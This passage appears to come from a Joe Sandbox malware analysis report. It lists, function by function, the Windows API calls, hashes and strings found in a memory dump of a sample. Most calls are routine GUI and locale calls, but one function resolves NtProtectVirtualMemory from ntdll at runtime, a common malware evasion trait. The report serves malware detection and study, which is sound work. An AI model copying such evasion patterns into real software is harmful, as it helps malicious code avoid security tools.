                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e81c1028f03c3e38a957afb5379dfdff5ddc4b9579ca2172530aa26ccaf255d6
                                                                                                                                            • Instruction ID: 9c10b91f30afdf24d1428b147773f8ab14305de90e755546950164344f7b91cc
                                                                                                                                            • Opcode Fuzzy Hash: e81c1028f03c3e38a957afb5379dfdff5ddc4b9579ca2172530aa26ccaf255d6
                                                                                                                                            • Instruction Fuzzy Hash: 5781B534A04248EFDB44DB98D688EAEB7F9AF48314F2545E5E408DB362CB74AE41DF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetMenu.USER32(00000000), ref: 02A1D800
                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 02A1D81D
                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 02A1D852
                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 02A1D86E
                                                                                                                                              • Part of subcall function 029D669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 029D66CE
                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 02A1D8B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$LoadStringWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1738039741-0
                                                                                                                                            • Opcode ID: 59243dc728898b2730f065c48ce3d9baba3be9cf249c92d523643f2aab2bdfb1
                                                                                                                                            • Instruction ID: 89eed4fad4ba2476dec8dca470e8d2256848df7f4822cfc1e0ae7a43d971f247
                                                                                                                                            • Opcode Fuzzy Hash: 59243dc728898b2730f065c48ce3d9baba3be9cf249c92d523643f2aab2bdfb1
                                                                                                                                            • Instruction Fuzzy Hash: 9B51B230B44B408BDB25AF78C9C879A77A6AF40728F0444B6EC49EB296DF74D845CF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 029FFFFF
                                                                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 02A00050
                                                                                                                                            • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 02A00089
                                                                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 02A00096
                                                                                                                                            • DrawTextA.USER32(00000000,00000000,?,?,?), ref: 02A00101
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Draw$OffsetRectText$Edge
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3610532707-0
                                                                                                                                            • Opcode ID: c3e0f5f79bf8a8b9993a6fdc0a099055cab7c110db86c9de982d7d9954ce2513
                                                                                                                                            • Instruction ID: a5a845227a6574919535cc69fb225d0a3b287e022097d6e8b551559c886005ed
                                                                                                                                            • Opcode Fuzzy Hash: c3e0f5f79bf8a8b9993a6fdc0a099055cab7c110db86c9de982d7d9954ce2513
                                                                                                                                            • Instruction Fuzzy Hash: ED519571E04204AFDBA1EFA8D9C0B9EB7BAAF45320F1545A5FD14A7390C734EE449B50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02A07F88: WindowFromPoint.USER32(-000000F7,?,00000000,02A07B5A,?,-00000010,?), ref: 02A07F8E
                                                                                                                                              • Part of subcall function 02A07F88: GetParent.USER32(00000000), ref: 02A07FA5
                                                                                                                                            • GetWindow.USER32(00000000,00000004), ref: 02A07B62
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02A07C36
                                                                                                                                            • EnumThreadWindows.USER32(00000000,02A07AD4,?), ref: 02A07C3C
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 02A07C53
                                                                                                                                            • IntersectRect.USER32(?,?,?), ref: 02A07CC1
                                                                                                                                              • Part of subcall function 02A06FC8: GetWindowThreadProcessId.USER32(?), ref: 02A06FD5
                                                                                                                                              • Part of subcall function 02A06FC8: GetCurrentProcessId.KERNEL32(?,00000000,?,02A03C39,?,02A02CF5), ref: 02A06FDE
                                                                                                                                              • Part of subcall function 02A06FC8: GlobalFindAtomA.KERNEL32(00000000), ref: 02A06FF3
                                                                                                                                              • Part of subcall function 02A06FC8: GetPropA.USER32(?,00000000), ref: 02A0700A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2202917067-0
                                                                                                                                            • Opcode ID: 095b10e546de6d0890b9d7571969942487bdd59d5f1ed4a00499ef219c7bca0a
                                                                                                                                            • Instruction ID: 7965fb39e5b8e41a64066033a0371a47833ef421972e9431f06b3b94c0f940c1
                                                                                                                                            • Opcode Fuzzy Hash: 095b10e546de6d0890b9d7571969942487bdd59d5f1ed4a00499ef219c7bca0a
                                                                                                                                            • Instruction Fuzzy Hash: 04512835A002099FDB10DFA8E9C4AAEB7F5AB49354F1485A1E915EB381DB34ED41CFA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • BeginPaint.USER32(00000000,?), ref: 02A0F91F
                                                                                                                                            • SaveDC.GDI32(00000000), ref: 02A0F958
                                                                                                                                            • ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,02A0FA16,?,00000000), ref: 02A0F9DA
                                                                                                                                            • RestoreDC.GDI32(00000000,?), ref: 02A0FA10
                                                                                                                                            • EndPaint.USER32(00000000,?,02A0FA5A), ref: 02A0FA4D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3808407030-0
                                                                                                                                            • Opcode ID: 0a978484d0280357432a2a7321b01bdff0eb89a423d2a28f5a6c3a5e1867f38e
                                                                                                                                            • Instruction ID: 0319ee049ebb23c5d5d96419ab965353ec896f03c53344224ad36a5866217f61
                                                                                                                                            • Opcode Fuzzy Hash: 0a978484d0280357432a2a7321b01bdff0eb89a423d2a28f5a6c3a5e1867f38e
                                                                                                                                            • Instruction Fuzzy Hash: 96416D70A04248AFDB24DBA8E9D5FAEBBF5BF48704F1544A8E505E76A1CF749D01CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 826f94112c91c6305e8a542af0afd69e72956993fdaea8de8d93ef7aa4725bad
                                                                                                                                            • Instruction ID: 875d59a8942af8552a8c21f53a5911c4ba02187372fa3dd84a61ce83141cb976
                                                                                                                                            • Opcode Fuzzy Hash: 826f94112c91c6305e8a542af0afd69e72956993fdaea8de8d93ef7aa4725bad
                                                                                                                                            • Instruction Fuzzy Hash: BA1106327003099ADBE0BEB9D808B9B368E8F80744F405015BF05DB7C3EB24C80A8B94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(00000000), ref: 029F61A2
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 029F61B7
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 029F61C1
                                                                                                                                            • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,029F4D0F,00000000,029F4D9B), ref: 029F61E5
                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 029F61F0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2404249990-0
                                                                                                                                            • Opcode ID: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
                                                                                                                                            • Instruction ID: 72df093281ad7548cc0fad7705d1a543fe059359d56235541ef34a4635c0c1fb
                                                                                                                                            • Opcode Fuzzy Hash: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
                                                                                                                                            • Instruction Fuzzy Hash: C311B631B013A96EDBE0EF7998407EE3BDEAF81355F040125FE209B181D7B4A894C7A1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 02A20E6C
                                                                                                                                            • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 02A20E9E
                                                                                                                                            • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,02A1E59C), ref: 02A20ED7
                                                                                                                                            • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 02A20EF0
                                                                                                                                            • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,02A1E59C), ref: 02A20F06
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Long$AttributesLayeredRedraw
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1758778077-0
                                                                                                                                            • Opcode ID: 876a32d34b61ef3fc644da844200d5630ac2d1b706d7f7ace5c1e683c7b4ab3f
                                                                                                                                            • Instruction ID: 7ab54e1ab725b9bab4e6a46d45c25645c37c5b1ab8e8f7543635c01538d07aa1
                                                                                                                                            • Opcode Fuzzy Hash: 876a32d34b61ef3fc644da844200d5630ac2d1b706d7f7ace5c1e683c7b4ab3f
                                                                                                                                            • Instruction Fuzzy Hash: 2211A961A442A016CF11ABBC4CC4BD5669E1B45329F084DB3BE9AEE1C6CF68C948CF60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(00000000), ref: 029F3B78
                                                                                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 029F3B94
                                                                                                                                            • GetPaletteEntries.GDI32(04080DCD,00000000,00000008,?), ref: 029F3BAC
                                                                                                                                            • GetPaletteEntries.GDI32(04080DCD,00000008,00000008,?), ref: 029F3BC4
                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 029F3BE0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EntriesPalette$CapsDeviceRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3128150645-0
                                                                                                                                            • Opcode ID: a19673dba3e49b2a11d43001a5efd00211ecb011018ced68e45aa07101f6a4cf
                                                                                                                                            • Instruction ID: 60d86fdb700f3ac8d494f65acfb87197118e0160037564b5ea8d3bb4d8bdd24c
                                                                                                                                            • Opcode Fuzzy Hash: a19673dba3e49b2a11d43001a5efd00211ecb011018ced68e45aa07101f6a4cf
                                                                                                                                            • Instruction Fuzzy Hash: 3211043168C3446EFB80DAA8AC45F6D77EDE785700F00C4DAF6189A1C0DB76A444CB24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,029DBBE7,?,?,00000000), ref: 029DBB68
                                                                                                                                              • Part of subcall function 029DB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029DB8E2
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,029DBBE7,?,?,00000000), ref: 029DBB98
                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000BA9C,00000000,00000000,00000004), ref: 029DBBA3
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,029DBBE7,?,?,00000000), ref: 029DBBC1
                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000BAD8,00000000,00000000,00000003), ref: 029DBBCC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4102113445-0
                                                                                                                                            • Opcode ID: 6debd82a1bee8736ad669205e9f9d87f7e9a7a174d285fbaeee406fcae34ca6e
                                                                                                                                            • Instruction ID: 67524f0a18c5a54df011dbe8b0acdb7d220178c8f2f0855229a083eda87be09b
                                                                                                                                            • Opcode Fuzzy Hash: 6debd82a1bee8736ad669205e9f9d87f7e9a7a174d285fbaeee406fcae34ca6e
                                                                                                                                            • Instruction Fuzzy Hash: 4B01F2306042046BFA01BAA49C22F6A369DDBC5B18F52C564F401EA6C4EB389E00AA68
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 02A2257F
                                                                                                                                            • SetEvent.KERNEL32(00000000,02A24D8A), ref: 02A2259A
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02A2259F
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,02A24D8A), ref: 02A225B4
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,02A24D8A), ref: 02A225BF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2429646606-0
                                                                                                                                            • Opcode ID: 65d62f340251dd513803e68908f02b60bda17e3c53ffa07985fbf0cb3b346da0
                                                                                                                                            • Instruction ID: 3d9b98c55c7199815a1fb35e6674c95ec73cb3d669e9c3965aca4c67a7ef2b88
                                                                                                                                            • Opcode Fuzzy Hash: 65d62f340251dd513803e68908f02b60bda17e3c53ffa07985fbf0cb3b346da0
                                                                                                                                            • Instruction Fuzzy Hash: 68F09271980610DFC724EFB8E8ACA1533B9E744309B048D14E614E2182DF38E06ADF11
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,029DBDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 029DBC2F
                                                                                                                                              • Part of subcall function 029DB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029DB8E2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                                            • API String ID: 4232894706-1253427255
                                                                                                                                            • Opcode ID: f6df42962e79865ec57e3ebca3142624a19ce3273413564cc8db668307ce9e56
                                                                                                                                            • Instruction ID: f8a63895708608e51e0451beeef0babcfd7bd6192673051bb6dc7be19b6b953d
                                                                                                                                            • Opcode Fuzzy Hash: f6df42962e79865ec57e3ebca3142624a19ce3273413564cc8db668307ce9e56
                                                                                                                                            • Instruction Fuzzy Hash: 284121A47042068BD701AA7988B03BFB2EBEFD130CB16D825D4A1D7344DF34E906BA65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 02A034E6
                                                                                                                                            • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 02A03538
                                                                                                                                            • DrawMenuBar.USER32(00000000), ref: 02A03545
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                            • String ID: P
                                                                                                                                            • API String ID: 3227129158-3110715001
                                                                                                                                            • Opcode ID: 25e155820d97939aa176c06464480172646aa8c2e6a6e4bd455af692eb787eaf
                                                                                                                                            • Instruction ID: b547f3a3cee32ab338eb046e832cf0aefb47c10778b9d4d1829b891887b19fbf
                                                                                                                                            • Opcode Fuzzy Hash: 25e155820d97939aa176c06464480172646aa8c2e6a6e4bd455af692eb787eaf
                                                                                                                                            • Instruction Fuzzy Hash: F31191706452006FD750DB28DCC4B5E7BDAAB84358F14C6A8F094CB2E4DB79D849CB86
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 029EFC21
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 029EFC27
                                                                                                                                            Strings
                                                                                                                                            • NtProtectVirtualMemory, xrefs: 029EFC17
                                                                                                                                            • C:\Windows\System32\ntdll.dll, xrefs: 029EFC1C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                                            • API String ID: 1646373207-1386159242
                                                                                                                                            • Opcode ID: 085f09d6276ddcdf9f260a8222c467d74a9d87bd1605b4734314338d52468b32
                                                                                                                                            • Instruction ID: f806be326345709b5266dc9f5a0c5406f42b43be6caff9b2b8a5903cafa88e88
                                                                                                                                            • Opcode Fuzzy Hash: 085f09d6276ddcdf9f260a8222c467d74a9d87bd1605b4734314338d52468b32
                                                                                                                                            • Instruction Fuzzy Hash: F0E0B6B6644208AF9B40EF98E885D8B37ECAB5CB107408405FA1AD7201C735E8619B70
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,02A3910B,00000000,02A3911E), ref: 029DD6A6
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 029DD6B7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                                                            • Opcode ID: 6c63063e2e5eee8dfafdc881bbc342563f692dbc7f028f79ea7fde62c3ce29f9
                                                                                                                                            • Instruction ID: 8029db120679b005fa6c27e0ab1d317c1be8fa7d22f7dcac73d7e0f11d4a802f
                                                                                                                                            • Opcode Fuzzy Hash: 6c63063e2e5eee8dfafdc881bbc342563f692dbc7f028f79ea7fde62c3ce29f9
                                                                                                                                            • Instruction Fuzzy Hash: BBD0A7BAA943544BFB00BBE47CC061123ECB390300B80C929748956182CB74C413FBE0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 02A0D6AB
                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 02A0D6E6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4a0aac24346f17d56c05be26f0d77f7ec5981fa40d4c726fd25a7dc9f24c2bd9
                                                                                                                                            • Instruction ID: 7c2b27c1c5cc0b004c37db61052c9ceb41ec8de4ef078c2e0337aaec0e5d38f8
                                                                                                                                            • Opcode Fuzzy Hash: 4a0aac24346f17d56c05be26f0d77f7ec5981fa40d4c726fd25a7dc9f24c2bd9
                                                                                                                                            • Instruction Fuzzy Hash: 13D16876A04A09DFDB11CFA8C4C4BAABBF6FF49300F148959E45A9B395CB30E941CB50
                                                                                                                                            Uniqueness

